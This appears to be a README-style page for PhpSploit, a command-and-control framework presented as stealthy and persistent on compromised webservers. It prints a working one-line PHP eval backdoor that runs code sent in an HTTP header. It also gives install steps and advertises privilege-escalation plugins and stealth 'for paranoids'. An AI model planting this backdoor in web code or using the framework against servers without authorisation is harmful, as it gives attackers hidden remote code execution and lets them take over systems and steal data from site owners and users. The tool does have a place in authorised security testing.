Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"
Efficient: More than 20 plugins to automate privilege-escalation tasks
Stealth: The framework is made by paranoids, for paranoids
Convenient: A robust interface with many crucial features
help
command)Thanks goes to these wonderful people:
nil0x42 💻 🚇 🔌 ⚠️ |
shiney-wh 💻 🔌 |
Wannes Rombouts 💻 🚧 |
Amine Ben Asker 💻 🚧 |
jose nazario 📖 🐛 |
Sujit Ghosal 📝 |
Zerdoumi 🐛 |
tristandostaler 🐛 |
Rohan Tarai 🐛 |
Jonas Lejon 📝 |
This project follows the all-contributors specification. Contributions of any kind welcome